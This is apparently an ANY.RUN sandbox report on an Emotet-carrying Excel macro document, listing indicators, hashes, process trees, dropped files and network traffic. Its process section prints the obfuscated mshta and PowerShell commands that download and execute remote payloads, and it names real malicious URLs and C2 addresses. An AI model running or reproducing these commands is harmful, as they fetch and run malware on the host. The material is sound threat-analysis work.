analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

report 01 24 2022.xls

Full analysis: https://app.any.run/tasks/fcaec7dd-81ac-4d28-be2c-ad1388c67e2e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: January 24, 2022, 18:31:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
loader
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 01:40:11 2022, Last Saved Time/Date: Mon Jan 24 01:57:49 2022, Security: 0
MD5:

7D4831A889F935E5FA6004F12C11D9C3

SHA1:

E2079E67854C2AB4F3EC63D4B976E446C433108C

SHA256:

884400589FD2B1D61B2F88EDC5FD97AA90B2A4CD2277C07C4A468D3A0CBD2A1A

SSDEEP:

3072:yW+nBqmsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIXxe53lGvFTQ3IzxgdrvxpU0S:t+nBqmsk3hbdlylKsgqopeJBWhZFVE+S

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2232)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2232)

    • Executes PowerShell scripts

      • mshta.exe (PID: 2364)

    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 3368)
      • SearchProtocolHost.exe (PID: 3128)
      • rundll32.exe (PID: 1996)
      • rundll32.exe (PID: 904)
      • rundll32.exe (PID: 3012)

    • Connects to CnC server

      • rundll32.exe (PID: 3012)

  • SUSPICIOUS

    • Checks supported languages

      • cmd.exe (PID: 1888)
      • mshta.exe (PID: 2364)
      • powershell.exe (PID: 1936)
      • cmd.exe (PID: 2404)

    • Reads the computer name

      • mshta.exe (PID: 2364)
      • powershell.exe (PID: 1936)

    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2364)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1888)

    • Reads Environment values

      • powershell.exe (PID: 1936)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1936)

    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 2404)
      • rundll32.exe (PID: 3368)
      • rundll32.exe (PID: 1996)
      • rundll32.exe (PID: 904)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1936)
      • rundll32.exe (PID: 1996)

    • Drops a file with a compile date too recent

      • powershell.exe (PID: 1936)
      • rundll32.exe (PID: 1996)

    • Application launched itself

      • rundll32.exe (PID: 1996)
      • rundll32.exe (PID: 904)

    • Starts itself from another location

      • rundll32.exe (PID: 3368)

  • INFO

    • Reads the computer name

      • EXCEL.EXE (PID: 2232)
      • PING.EXE (PID: 2740)
      • rundll32.exe (PID: 1996)
      • rundll32.exe (PID: 3012)

    • Checks supported languages

      • PING.EXE (PID: 2740)
      • EXCEL.EXE (PID: 2232)
      • timeout.exe (PID: 2460)
      • rundll32.exe (PID: 3368)
      • rundll32.exe (PID: 1996)
      • rundll32.exe (PID: 904)
      • rundll32.exe (PID: 3012)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2232)

    • Reads internet explorer settings

      • mshta.exe (PID: 2364)

    • Checks Windows Trust Settings

      • powershell.exe (PID: 1936)
      • rundll32.exe (PID: 3012)

    • Reads settings of System Certificates

      • rundll32.exe (PID: 3012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: xXx
LastModifiedBy: xXx
Software: Microsoft Excel
CreateDate: 2022:01:24 01:40:11
ModifyDate: 2022:01:24 01:57:49
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Time Card
  • Sheet1
  • FF
HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
12
Malicious processes
5
Suspicious processes
3

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs ping.exe no specs timeout.exe no specs mshta.exe powershell.exe searchprotocolhost.exe no specs cmd.exe no specs rundll32.exe no specs rundll32.exe rundll32.exe no specs rundll32.exe

Process information

PID
CMD
Path
Indicators
Parent process
2232"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
1888cmd /c ping google.com && timeout 4 && start ms^h^ta ht^tp:/^/0x^b^907d60^7/fe^r/f^e5.h^tm^lC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2740ping google.com C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2460timeout 4 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2364mshta http://0xb907d607/fer/fe5.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1936"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe5.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3128"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\system32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Version:
7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211)
2404"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3368C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\SysWow64\rundll32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1996C:\Windows\system32\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServerC:\Windows\system32\rundll32.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
8 959
Read events
8 799
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
9
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2232EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR274A.tmp.cvr
MD5:
SHA256:
3012rundll32.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:5AA39E6B1DA7435D3F03749A9EEC72E1
SHA256:D6F6C809E79E82631436CAFF61998071540140885993B9ED84753ADCC8FDB9DF
3012rundll32.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:15A1999569D731346950C6F8360CDF52
SHA256:5552A6CF55940A25156FF748883C78304EE3C51E6830043F69FB65B9E98322AD
3012rundll32.exeC:\Users\admin\AppData\Local\Temp\TarD0E9.tmpcat
MD5:D99661D0893A52A0700B8AE68457351A
SHA256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
2364mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe5[1].htmbinary
MD5:85C42FB32CB9993BB701ECA2A08287DB
SHA256:8696E887EB7047385790D045BDFAC93A857071BE3846ED6912CB2BA09D2053E9
1936powershell.exeC:\Users\Public\Documents\ssd.dllexecutable
MD5:5928EA4CDAD3A9769DA7F85BA24DF169
SHA256:085BCE50E31F8AEC11DE06DAA65211F4AB52C3733CA7C0B0C19362EE3B87809A
1996rundll32.exeC:\Users\admin\AppData\Local\Qupolbegjjqoo\wprf.brbexecutable
MD5:5928EA4CDAD3A9769DA7F85BA24DF169
SHA256:085BCE50E31F8AEC11DE06DAA65211F4AB52C3733CA7C0B0C19362EE3B87809A
1936powershell.exeC:\Users\admin\AppData\Local\Temp\jy3xzcg3.upo.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3012rundll32.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
SHA256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
1936powershell.exeC:\Users\admin\AppData\Local\Temp\1r3c54jw.pnn.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
23
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2364
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe5.html
FR
binary
10.7 Kb
malicious
1936
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe5.png
FR
text
1.05 Kb
malicious
1936
powershell.exe
GET
200
46.51.216.192:80
http://iwannago.dev.bizapps.sg/axedi/gtlf2pXOavEAOR/
SG
executable
780 Kb
suspicious
1936
powershell.exe
GET
403
92.222.139.190:80
http://dopevision.tn/wp-admin/SiXj7Yc9QQrTa/
FR
html
261 b
malicious
3012
rundll32.exe
GET
200
23.32.238.178:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?cc3e329949c8166f
US
compressed
59.9 Kb
whitelisted
1936
powershell.exe
GET
404
89.46.105.75:80
http://www.ufficiomodernosas.it/old/IzGP8VipCQxWMDuum/
IT
html
196 b
suspicious
3012
rundll32.exe
GET
200
23.32.238.178:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?caff5126f7e2c9ce
US
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
92.222.139.190:80
dopevision.tn
OVH SAS
FR
malicious
3012
rundll32.exe
80.211.3.13:8080
Aruba S.p.A.
IT
suspicious
1936
powershell.exe
89.46.105.75:80
www.ufficiomodernosas.it
Aruba S.p.A.
IT
suspicious
3012
rundll32.exe
23.32.238.178:80
ctldl.windowsupdate.com
XO Communications
US
suspicious
2364
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
1936
powershell.exe
46.51.216.192:80
iwannago.dev.bizapps.sg
Amazon.com, Inc.
SG
suspicious
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
1936
powershell.exe
88.218.116.38:443
www.top-art.co.il
ES
unknown
1936
powershell.exe
103.104.73.107:443
ss100feet.com
malicious
1936
powershell.exe
3.211.126.45:443
directorio.reservado.com.bo
US
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
dopevision.tn
  • 92.222.139.190
malicious
ss100feet.com
  • 103.104.73.107
malicious
directorio.reservado.com.bo
  • 3.211.126.45
unknown
www.top-art.co.il
  • 88.218.116.38
unknown
www.ufficiomodernosas.it
  • 89.46.105.75
suspicious
iwannago.dev.bizapps.sg
  • 46.51.216.192
suspicious
ctldl.windowsupdate.com
  • 23.32.238.178
  • 23.32.238.201
whitelisted

Threats

PID
Process
Class
Message
1936
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1936
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1936
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3012
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 22
3012
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 5
5 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
report 01 24 2022.xls